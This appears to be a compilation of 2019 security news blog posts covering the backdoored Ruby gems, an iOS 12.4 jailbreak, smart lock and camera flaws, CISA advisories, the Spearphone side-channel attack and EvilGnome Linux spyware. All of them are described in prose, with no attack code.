My information Resource (blog.mir.net)

    The Ruby programming language is a high level general-purpose programming language that was developed to focus on being Object oriented when the options for it were few and the creator found them lacking. The language uses a package manager called RubyGems to have a standardized platform for managing programs and libraries. 

    Thousands of users are potentially affected by vulnerabilities in 18 versions of Ruby libraries. The vulnerabilities included code that launched crypto miners inside other Ruby Projects. Other features of the compromised libraries included collection and delivery of data including credentials, payment, service provider, and the entire database to a server in the Ukraine. The backdoor contained a way for an attacker to send cookies through this vulnerability and to remotely execute code and commands. The code was inserted into several different crypto-mining libraries as well as a few utilities like omniauth_amazon and cron_parser. These are all relatively small packages, but the malicious actor tried to push his updates onto rest-client which is a much more widely used and scrutinized project, the backdoor was identified within hours and other projects where it was inserted were also discovered.
    Because of the quick identification time, there were only around a thousand downloads of the latest update for this older version of rest-client. However, the smaller libraries had this attack in place for over a month. Thankfully, the total downloads for all of those libraries combined numbered less than 3000. We last saw such dependency attacks in the strong_password library which downloaded a payload from pastebin.com instead of holding malicious code itself. 
    Of crowd sourced and open sourced projects, one must take extra precautions and evaluate the diffs between updates properly before committing to using such a solution. Without due diligence, one could find themselves unknowingly inserting bad code into their projects or relying on bad dependencies that could compromise both developer data, and user data in their products and projects. Relying on the descriptions and faith that a thoroughly used gem is a disservice to you as well as a disservice to the community at large.
Sources
• https://securityaffairs.co/wordpress/90146/hacking/ruby-librariesbackdoor.html

• https://github.com/rest-client/rest-client/issues/713

• https://www.zdnet.com/article/backdoor-code-found-in-11-ruby-libraries/08

    Apple accidentally re-introduced a previously patched vulnerability from iOS 12.3 into iOS 12.4. This led to the release of a jailbreak for iOS 12.4 from Security Researcher Pwn20wnd called “unc0ver 3.5.0.” This is the first jailbreak to be released for up-to-date iPhones in years. This is significant, because, according to an article from Motherboard, iPhone bugs are so valuable that they are often not reported to Apple at all, and jailbreak exploits are often sold for large amounts of money. For example, the FBI paid over $1.2 million for a vulnerability that allowed them to gain access to an iPhone 5c used by San Bernardino shooter Syed Farook. 

    Another reason security researchers might be unwilling to report bugs to Apple is that Apple doesn’t offer a strong enough incentive. After refusing to offer a bug bounty program for some time, Apple announced its bug bounty program in 2016. Rewards range from $25,000 for “Access from a sandboxed process to user data outside of that sandbox process” to $200,000 for “Secure boot firmware components.” While this may sound like a lot of money, it is nothing compared to what Companies like Zerodium and Exodus offer for similar exploits. Zerodium has offered up to $1.5 million for exploits that would allow jailbreaks, and Exodus has offered up to $500,000 for similar exploits. Alternatively, some researchers don’t report bugs to Apple because the patching of those bugs would interfere with their ability to do further research. According to Luca Todesco, a well-known figure in the iPhone jailbreak community, “Either you report and kill your own bugs, or you decide not to report the bug so that you don’t complicate your own life and you can keep doing research.”

    The vulnerability used in this jailbreak was discovered by New Williamson, who works for Google Project Zero. The bug, titled CVE-2019-8605, could allow a malicious application to “execute arbitrary code with system privileges.” According to The Hacker News, “besides embedding the exploit into an innocentlooking app, the vulnerability can also be exploited remotely by combining it with sandbox bypass flaws in Apple Safari web browser or other Internet exposed services.” Even with this vulnerability, remotely hacking an iPhone is still a difficult task. However, it is substantially less difficult while this bug still exists on iPhones. 
Sources:
• https://www.vice.com/en_us/article/qvgp77/hacker-releases-first-publiciphone-jailbreak-in-years

• https://thehackernews.com/2019/08/ios-iphone-jailbreak.html

• https://support.apple.com/en-us/HT210118

• https://www.vice.com/en_us/article/gybppx/iphone-bugs-are-too-valuable-to-report-to-apple08

Knowbe4 is a great solution for companies to train user on Social Engineering issues.
Here a great example of the content that they deliver to their base.

Go to their blog at https://blog.knowbe4.com/ and also explore the free tools on their site https://www.knowbe4.com/free-it-security-tools

    New technology often saturates a market before fully ripening to prime usefulness. The race to be first to market is often seen in the idea of recognized household names like Alexa, Blackberry, or even the Oculus Rift. While they might not always be the best at what they do, the familiarity can smooth over many of the kinks in the products they produce.

     The Hickory Smart Bluetooth Enabled Deadbolt allows its user to manage their home security remotely and to have the assurance that the door is locked in case they are concerned that they forgot to do so when they left the house. While this function seems to be useful to a potential customer, they have had 6 vulnerabilities uncovered by Rapid7 security researchers. One of the most concerning vulnerabilities is cleartext credential transmission from the Hickory Smart Ethernet Bridge device; it’s something I would expect even the least security minded designer to avoid.

    The rest of the data is encrypted and it would be difficult to translate the credentials into actionable information regarding the deadbolt, but if the user were to change the credentials from the defaults and an adversary were able to obtain said credentials, they could be included in future credential stuffing attacks affecting the user. The Amcrest IP2M-841B IP camera is a rebranded Dahua camera; Dahua has had a history of security issues. It has a bug that exposes allows anyone to connect to the camera over http and decode the audio output for their listening pleasure.

    The camera wraps transmissions in a DHAV container, but it is trivial to decipher and play in a VLC player. In their haste to provide a product, they seem to be keeping these products at different patch levels, exposing users to security issues that may have been already patched. As Amcrest is one of many companies to sell rebranded Dahua products, it is unknown how many products are vulnerable to this bug.

    While the focus on being first to market with a technology may establish a foothold in the homes of consumers, it also makes the customers they seek to serve vulnerable to any cyber security risks that may have been left on the cutting room floor in the rush to get the product out the door. Testing and security is becoming ever more challenging by the day and each year we find our old standards insufficient. The effort to obtain access to an unlocked door or bugged camera might not be cost efficient to do for the average person at scale, but it easily puts higher value targets at risk, and simply not being a target is no excuse to support these practices.

Sources:

• https://threatpost.com/unpatched-flaws-in-iot-smart-deadbolt-open-homes-to-danger/146871/

• https://blog.rapid7.com/2019/08/01/r7-2019-18-multiple-hickory-smart-lock-vulnerabilities/

• https://medium.com/tenable-techblog/i-always-feel-like-somebodys-w̶a̶t̶c̶h̶i̶n̶g̶-listening-to-me-938cc14aa13c

In the wake of the recent shootings in El Paso, TX, and Dayton, OH, the
Cybersecurity and Infrastructure Security Agency (CISA) advises users to watch
out for possible malicious cyber activity seeking to capitalize on these tragic
events. Users should exercise caution in handling emails related to the
shootings, even if they appear to originate from trusted sources. Fraudulent
emails often contain links or attachments that direct users to phishing or
malware-infected websites. Emails requesting donations from duplicitous
charitable organizations are also common after tragic events. Be wary of
fraudulent social media pleas, calls, texts, donation websites, and
door-to-door solicitations relating to these events.

To avoid becoming a victim of malicious activity, users and administrators
should consider taking the following preventive measures:

• Use caution when opening email attachments, and do not
  click on links in unsolicited email messages. Refer to CISA’s Tip on Using Caution with Email
  Attachments.
• Review CISA’s Tip on Staying Safe on Social
  Networking Sites.
• Refer to CISA’s Tip on Avoiding Social
  Engineering and Phishing Attacks.
• Review the information from the Federal Trade
  Commission on Before
  Giving to a Charity.

The National Institute of Standards and Technology (NIST) National
Cybersecurity Center of Excellence (NCCoE) has published NIST
Cybersecurity Practice Guide: Multifactor Authentication for E-Commerce.
The guide provides e-commerce organizations multifactor authentication (MFA)
protection methods they can implement to reduce fraudulent purchases.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages
e-commerce organizations to download the guide to learn how to prevent
e-commerce fraud using MFA solutions.

The CERT Coordination Center (CERT/CC) has released information on a
vulnerability affecting Cylance Antivirus products. A remote attacker could
exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users
and administrators to review CERT/CC Vulnerability Note VU#489481 and the Cylance
Resolution for BlackBerry Cylance Bypass webpage for patch information and
additional recommended workarounds.

.

The Cybersecurity and Infrastructure Security Agency (CISA), Multi-State
Information Sharing & Analysis Center (MS-ISAC), National Governors
Association (NGA), and the National Association of State Chief Information
Officers (NASCIO) have released a Joint
Ransomware Statement with recommendations for state and local governments
to build resilience against ransomware:

1. Back
   up systems—now (and daily). Immediately and regularly back up all critical agency
   and system configuration information on a separate device and store the
   backups offline, verifying their integrity and restoration process. If recovering
   after an attack, restore a stronger system than the one lost, fully
   patched and updated to the latest version.
2. Reinforce
   basic cybersecurity awareness and education. Ransomware attacks
   often require the human element to succeed. Refresh employee training on
   recognizing cyber threats, phishing, and suspicious links—the most common
   vectors for ransomware attacks. Remind employees of how to report
   incidents to appropriate IT staff in a timely manner, which should include
   out-of-band communication paths.
3. Revisit
   and refine cyber incident response plans. Have a clear plan to
   address attacks when they occur, including when internal capabilities are
   overwhelmed. Make sure response plans include how to request assistance
   from external cyber first responders, such as state agencies, CISA, and
   MS-ISAC, in the event of an attack.

CISA encourages organizations to review the Joint
Ransomware Statement and the following ransomware guidance:

• MS-ISAC
  Security Primer on Ransomware
• CISA Tip
  Sheet on Ransomware
• NGA
  Disruption Response Planning Memo
• NASCIO
  Cyber Disruption Planning Guide

    A team of cybersecurity researchers – Abhishek Anand, Chen Wang, JIan Liu, Nitesh Saxena, and Yingying Chen – have discovered and demonstrated a new side -channel attack that could potentially allow apps to listen in on the voice coming through an Android phone’s loudspeakers without requiring any device permissions.

    This new attack has been named Spearphone.  It works by taking advantage of the accelerometer built into most Android phones. An accelerometer is a sensor that can detect and monitor the movement of a phone, like being shaken, tilted, or lifted up. The accelerometer can be accessed by any app with any permissions.

    According to The Hacker News, “Since the built-in loudspeaker of a smartphone is placed on the same surface as the embedded motion sensors, it produces surface-borne and aerial speech reverberations in the body of the smartphone when loudspeaker mode is enabled.” The nature of sound is vibrations that travel through a medium transferring energy to our ear drums which then translate the mechanical vibrations into electric signals which our brains translate into sounds. This attack bypasses the need for a second microphone replacing the audio receiver with the accelerometer in the phone itself to translate the soundwaves into electrical messages.

    The researchers created and Android application that was designed to record speech reverberations using the accelerometer and send the captured data back to an attacker-controller server as a proof-of-concept. The researchers have shown that this attack can successfully be used to spy on phone calls, listen to voice notes or multimedia, and to spy on the use of an assistant such as Google Assistant or Bixby, as shown below.

    In the world of malware, almost all malicious software is based around Windows desktop or Linux server systems. Part of this is due to the widespread use of these systems as well as the architecture of the Linux core operating system. This makes it even more surprising when researchers from Intezer recently discovered a desktop Linux spyware application dubbed EvilGnome that no security or antivirus scanners detect yet.

    EvilGnome is a collection of modules designed to spy on a user’s system and exfiltrate data to an external Command & Control (C2) server controlled by the attacker. It is designed to appear as an extension of the Gnome GUI environment for Linux desktop.

    The malware is a self-extracting archive shell script that installs the modules and sets up persistence through use of the crontab. The modules are: • ShooterSound—records audio clips from the user’s microphone using PulseAudio. • ShooterImage—captures screenshots of the user’s desktop. • ShooterFile—scans the filesystem and is capable of filtering files by type and creation date. • ShooterPing—data exfiltration module, also capable of receiving new commands from the C2 server and stopping other modules from running. • ShooterKey—possible keylogger module that appears to be unfinished.

    Many of the modules appear to be very limited or missing some functionality. Also, metadata about the malware’s creation was included in the upload to VirusTotal, leading the researchers to believe this was a prototype version of the malware that was mistakenly released.

    Intezer researchers believe the malware to be tied to the Russian-affiliated group Gamaredon. Not only does EvilGnome use the same hosting provider as Gamaredon for C2 servers and similar domain names such as .space and .ddns, it was also found on an IP address controlled by Gamaredon 2 months ago and uses techniques and modules similar to Gamaredon’s collection of Windows tools. 
To check if a Linux system is infected, look for an executable called gnome-shell -ext in the ~/.cache/gnome-software/gnome-shell-extensions  directory.

Sources:

• https://thehackernews.com/2019/07/linux-gnome-spyware.html

• https://www.bleepingcomputer.com/news/security/new-evilgnome-backdoor-spies-on-linux-users-steals-their-files/

• https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/